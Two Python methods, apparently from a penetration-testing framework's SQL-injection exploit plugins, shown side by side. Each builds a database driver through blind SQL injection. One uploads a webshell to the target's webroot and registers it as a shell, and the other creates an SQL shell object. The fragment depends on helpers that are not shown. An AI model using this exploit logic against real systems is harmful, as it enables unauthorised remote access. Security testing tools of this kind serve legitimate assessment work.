def _generateShell( self, vuln_obj ): ''' @parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands. @return: A sql_webshell shell object if sql_webshell could fingerprint the database. ''' bsql = blind_sqli_response_diff() bsql.setEqualLimit( self._equalLimit ) bsql.setEquAlgorithm( self._equAlgorithm ) dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal ) driver = dbBuilder.getDriverForVuln( vuln_obj ) if driver is None: return None else: # We have a driver, now, using this driver, we have to create the webshell in the # target's webroot! webshell_url = self._upload_webshell( driver, vuln_obj ) if webshell_url: # Define the corresponding cut... response = self._urlOpener.GET( webshell_url ) self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER ) # Create the shell object # Set shell parameters shell_obj = sql_web_shell( vuln_obj ) shell_obj.setUrlOpener( self._urlOpener ) shell_obj.setWebShellURL( webshell_url ) shell_obj.set_cut( self._header_length, self._footer_length ) kb.kb.append( self, 'shell', shell_obj ) return shell_obj else: # Sad face :( return None
def _generateShell(self, vuln_obj): """ @parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands. @return: A sqlmap shell object if sqlmap could fingerprint the database. """ bsql = blind_sqli_response_diff() bsql.setEqualLimit(self._equalLimit) bsql.setEquAlgorithm(self._equAlgorithm) dbBuilder = dbDriverBuilder(self._urlOpener, bsql.equal) driver = dbBuilder.getDriverForVuln(vuln_obj) if driver is None: return None else: # Create the shell object shell_obj = sqlShellObj(vuln_obj) shell_obj.setGoodSamaritan(self._goodSamaritan) shell_obj.setDriver(driver) kb.kb.append(self, "shells", shell_obj) return shell_obj